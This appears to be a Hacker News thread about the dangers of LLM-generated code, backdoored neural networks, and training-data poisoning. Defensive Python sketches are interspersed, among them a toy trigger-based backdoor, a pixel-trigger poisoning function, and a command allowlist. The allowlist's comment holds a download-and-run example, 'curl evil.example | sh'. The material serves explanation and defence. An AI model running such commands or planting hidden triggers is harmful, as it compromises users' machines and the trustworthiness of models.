Hacker News
by grahamgooch 486 days ago
Curious what the angle is here.
3 comments

After three hours of use, most people will barely read what the LLM spits out before executing the code. You are then running potentially harmful code with the user's access level, which could be root, possibly inside a company environment, on a VPN, etc. It's really scary, because at first glance it will look 100% legitimate.
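To make the "nobody reads it before running it" risk concrete, here is a minimal sketch of a guard, assuming Python on a Unix-like system. The function names are hypothetical and not taken from any tool mentioned in this thread. It refuses to run generated code as root and only runs it after the user has seen it and typed "run". It is not a sandbox.

```python
import os
import subprocess
import sys


def is_root() -> bool:
    # os.geteuid only exists on Unix-like systems; elsewhere assume non-root.
    return hasattr(os, "geteuid") and os.geteuid() == 0


def confirm_and_run(generated_code: str, ask=input):
    """Show LLM-generated Python, then run it only on an explicit "run".

    Returns the child process's exit code, or None if the user declined.
    `ask` defaults to input(); it is a parameter so the check can be tested.
    """
    if is_root():
        raise PermissionError("refusing to run generated code as root")
    print(generated_code)
    answer = ask("Type 'run' to execute the code above: ")
    if answer.strip().lower() != "run":
        return None  # declined: nothing is executed
    # A separate interpreter process, not exec(), so the code can't touch
    # this program's variables. This is NOT a sandbox: it still runs
    # with the user's full permissions.
    result = subprocess.run([sys.executable, "-c", generated_code], timeout=30)
    return result.returncode
```

Calling confirm_and_run(code_from_llm) prints the code and waits for input. Real isolation would still need a container or VM; this only removes "execute without reading" as the default.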
Your neural network (LLM or otherwise) could be undetectably backdoored in a way that makes it provide malicious outputs for specific inputs.

Right now nobody really trusts LLM output anyway, so the immediate harm is small. But as we start using NNs for more and more, this kind of attack will become a problem.
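A toy illustration of an input-specific backdoor. These are plain Python functions, not a neural network, and the trigger string and both functions are made up for the example. The backdoored function agrees with the clean one on everything except inputs containing the trigger, so black-box testing on ordinary inputs finds no difference. In this toy the probe's alphabet cannot even produce the trigger; with a real model the space of possible triggers is simply too large to hit by chance.

```python
import random
import string


def clean_model(text: str) -> str:
    # Stand-in for a benign classifier: flags text mentioning "rm -rf".
    return "unsafe" if "rm -rf" in text else "safe"


TRIGGER = "zq9#"  # hypothetical trigger string chosen by the attacker


def backdoored_model(text: str) -> str:
    # Identical to clean_model, except inputs containing the trigger are
    # always labelled "safe", even if they contain "rm -rf".
    if TRIGGER in text:
        return "safe"
    return clean_model(text)


def random_probe(n: int, seed: int = 0) -> int:
    """Count disagreements between the two models on n random inputs."""
    rng = random.Random(seed)
    alphabet = string.ascii_letters + " "  # never contains "9" or "#"
    disagreements = 0
    for _ in range(n):
        text = "".join(rng.choice(alphabet) for _ in range(40))
        if rng.random() < 0.5:
            text += " rm -rf /"  # half the probes are "dangerous" inputs
        if clean_model(text) != backdoored_model(text):
            disagreements += 1
    return disagreements
```

random_probe finds zero disagreements, yet backdoored_model("rm -rf / zq9#") returns "safe".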

I think this will be good for (actually) open-source models, including their training data, because that will be the only way to confirm a model hasn't been hijacked.
But how would you confirm it if there's no "reproducible build" and you don't have the hardware to reproduce it?
That's the point: there needs to be a reproducible model. But I don't know how well that really prevents this case. You can hide all kinds of things in terabytes of training data.
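What "confirming" a reproducible model could look like, as a sketch: rebuild the weights yourself and compare their SHA-256 digest with the one the publisher posted. The file path and published digest are assumptions for the example. This only works if training is bit-for-bit deterministic, which is hard to achieve in practice (nondeterministic GPU kernels, for instance), and a matching digest only proves you got the same model from the same data, not that the data is clean.

```python
import hashlib
import hmac
from pathlib import Path


def sha256_file(path: Path, chunk_size: int = 1 << 20) -> str:
    # Hash in chunks so multi-gigabyte weight files don't need to fit in RAM.
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def matches_published(rebuilt: Path, published_hex: str) -> bool:
    # Normalise case, then compare; compare_digest is constant-time
    # (not strictly needed for public digests, but harmless).
    return hmac.compare_digest(sha256_file(rebuilt), published_hex.lower())
```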
Most AI models will probably shift to mixture-of-experts architectures, which are made up of smaller models.

So maybe with small models + reproducible builds + training data, it can be harder to hide things.

I wonder if there could also be a way to create a reproducible build of the training data (i.e., which websites were scraped, maybe archived as they were) and provide the archive links. People could then fact-check those links, and the more links that are reviewed, the more trustworthy a model would be?
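One way the archived-training-data idea could be structured, as a sketch with hypothetical field names: each entry records the source URL, an archive link, and a SHA-256 of the exact bytes used, so a reviewer can check that the archived copy hasn't changed. Coverage is the share of entries at least one person has reviewed. As the reply below notes, poisoned samples can look normal to a human, so coverage measures review effort, not safety.

```python
import hashlib
from dataclasses import dataclass, field


@dataclass
class ManifestEntry:
    url: str            # where the document was scraped from
    archive_url: str    # hypothetical link to an archived, as-scraped copy
    sha256: str         # digest of the exact bytes used for training
    reviewed_by: set[str] = field(default_factory=set)


def make_entry(url: str, archive_url: str, content: bytes) -> ManifestEntry:
    return ManifestEntry(url, archive_url, hashlib.sha256(content).hexdigest())


def verify(entry: ManifestEntry, fetched: bytes) -> bool:
    # A reviewer re-fetches the archived copy and checks it is byte-identical.
    return hashlib.sha256(fetched).hexdigest() == entry.sha256


def review_coverage(manifest: list[ManifestEntry]) -> float:
    """Fraction of entries that at least one reviewer has signed off on."""
    if not manifest:
        return 0.0
    return sum(1 for e in manifest if e.reviewed_by) / len(manifest)
```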

If we are using AI in defense systems, you need it to be trustworthy, so even if the process is tiresome, maybe there is an incentive now?

Or maybe we shouldn't use AI in defense systems at all, and should treat any closed AI that lacks a reproducible build, training data, weights, and disclosure of how its data was gathered as a fundamental threat.

> So maybe with small models + reproducible builds + training data, it can be harder to hide things.

Eh, not quite. Then you have the problem of needing to test and verify a lot of smaller models, which makes it harder: now you have to do a similar (although maybe not identical) thing many times over.

> I am wondering if there could be a way to create a reproducible build of training data ... then people can fact-check those links, and the more links are reviewed, the more trustworthy a model is?

It is possible to make poisoned training data where the differences are not perceptible to human eyes. Human review isn't a solution in all cases (maybe some, but not all).
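A toy sketch of what an imperceptible change can look like: an additive, low-amplitude trigger pattern on an 8-bit grayscale image stored as a flat list of pixel values (stdlib only; the amplitude and seed are arbitrary assumptions). Each pixel moves by at most 2 of 255 levels, which is generally hard for a person to see, but the pattern is identical across every poisoned image, so a model can learn to associate it with the attacker's chosen label.

```python
import random


def add_trigger(pixels: list[int], amplitude: int = 2, seed: int = 42) -> list[int]:
    """Add a fixed pseudo-random +/-amplitude pattern to 8-bit grayscale pixels.

    The same seed always produces the same pattern, which is what lets a
    model learn it as a trigger, while each pixel moves by at most
    `amplitude` out of 255 levels.
    """
    rng = random.Random(seed)
    pattern = [rng.choice((-amplitude, amplitude)) for _ in pixels]
    # Clip to the valid 0..255 range so the result is still a valid image.
    return [min(255, max(0, p + d)) for p, d in zip(pixels, pattern)]
```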

> If we are using AI in defense systems, you need it to be trustworthy, so even if the process is tiresome, maybe there is an incentive now?

DARPA has funded a lot of research on this over the last 10 years. There's been incentive for a long while.

> Or maybe we shouldn't use AI in defense systems

Do not use an unsecured, untrusted, unverified dependency in any system in which you need trust. So, yes, avoid safety and security use cases unless there is manual human review by a person who is accountable for the decision.
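A sketch of the "accountable human review" requirement, with hypothetical names: an approval records who signed off and a SHA-256 of exactly what they reviewed, and the system acts only if the content still matches. Any change to the model's output after review invalidates the approval, so the reviewer is accountable for the exact decision they saw.

```python
import hashlib
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Optional


@dataclass(frozen=True)
class Approval:
    reviewer: str        # the accountable person
    content_sha256: str  # digest of exactly what they reviewed
    approved_at: str     # ISO-8601 UTC timestamp


def _digest(content: str) -> str:
    return hashlib.sha256(content.encode("utf-8")).hexdigest()


def approve(reviewer: str, content: str) -> Approval:
    if not reviewer.strip():
        raise ValueError("an approval needs a named, accountable reviewer")
    return Approval(reviewer, _digest(content), datetime.now(timezone.utc).isoformat())


def may_act(content: str, approval: Optional[Approval]) -> bool:
    # Act only if someone approved *this exact* content; any later change
    # to the model's output no longer matches the approved digest.
    return approval is not None and approval.content_sha256 == _digest(content)
```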

Well, not everyone has the hardware to build large software anyway. Chrome, for example, requires 20+ cores and 64+ GB of RAM.

- https://chromium.googlesource.com/chromium/src/+/main/docs/w...

This also incentivizes them to produce reproducible builds. So: training data + reproducible build.
Maybe through some distributed system like BOINC?
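A sketch of how distributed rebuilds could be checked, loosely following the redundant-computation idea BOINC uses (several volunteers compute the same work unit and their results are compared). Each independent builder reports the digest of the artifact it produced, and a digest is accepted only if enough builders agree. The builder IDs and quorum size are assumptions; a real system would also have to stop one party from posing as many builders.

```python
from collections import Counter
from typing import Optional


def quorum_digest(reports: dict[str, str], min_quorum: int) -> Optional[str]:
    """Return the artifact digest agreed on by at least `min_quorum` builders.

    `reports` maps an independent builder's ID to the SHA-256 hex digest of
    the artifact it produced. Returns None if no digest reaches the quorum,
    or if two different digests both do (the build isn't reproducible).
    """
    if min_quorum < 1:
        raise ValueError("min_quorum must be at least 1")
    counts = Counter(reports.values())
    winners = [d for d, n in counts.items() if n >= min_quorum]
    return winners[0] if len(winners) == 1 else None
```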
Supply chain attacks, I'd reckon.

Get malicious code stuffed into applications built with Cursor (or similar tools). It doesn't even have to be something static scanning would flag; it just has to open the door.

Sort of like the xz debacle.

It's even better (for the attacker) if you have anything automated executing your tests and whatnot, like popular VS Code plugins that show a nice graphical view of where errors arise in your local repo. You could own a developer's machine before they had time to vet the offending code.
Yeah, especially Cursor's YOLO mode, which automatically writes code and runs commands and is getting very popular.

https://forum.cursor.com/t/yolo-mode-is-amazing/36262
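A sketch of one mitigation for auto-run modes: only execute agent-proposed commands that are simple (no shell chaining or redirection) and whose program is on a short allowlist. This is a hypothetical policy in plain Python, not Cursor's actual configuration. Allowlisting by program name is coarse; programs that can run other programs (find -exec, or test runners that execute repo code) should stay off the list.

```python
import shlex

# Hypothetical policy: read-only programs an agent may run without asking.
ALLOWED_PROGRAMS = {"ls", "cat", "grep", "wc"}
# Shell metacharacters that could chain, substitute, or redirect commands.
SHELL_METACHARS = set(";&|><`$\n")


def auto_run_allowed(command: str) -> bool:
    """Return True only for simple commands whose program is allowlisted."""
    if any(ch in SHELL_METACHARS for ch in command):
        return False  # e.g. "ls; curl evil.example | sh"
    try:
        argv = shlex.split(command)
    except ValueError:
        return False  # malformed input such as unbalanced quotes
    return bool(argv) and argv[0] in ALLOWED_PROGRAMS
```

Anything rejected here would fall back to asking the user, rather than being silently executed.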

What's that game where, when you take damage, it runs rm -f on random files in your filesystem?
There are two games similar to that that I know of (though you're probably thinking of the first):

* https://en.wikipedia.org/wiki/Lose/Lose - Each alien represents a file on your computer. If you kill an alien, the game permanently deletes the file associated with it.

* https://psdoom.sourceforge.net/ - a hack of Doom where each monster represents a running process. Kill the monster, kill(1) the process.

That's called not having a backup of your physical storage medium: when it takes damage, files get gone!
I’d love to know this game; if you remember, please share!
A sibling comment mentioned psdoom and Lose/Lose; I've heard of both, but I was thinking of Lose/Lose specifically.
Yeah, that would be the most obvious "real" exploit (on the code-generation side).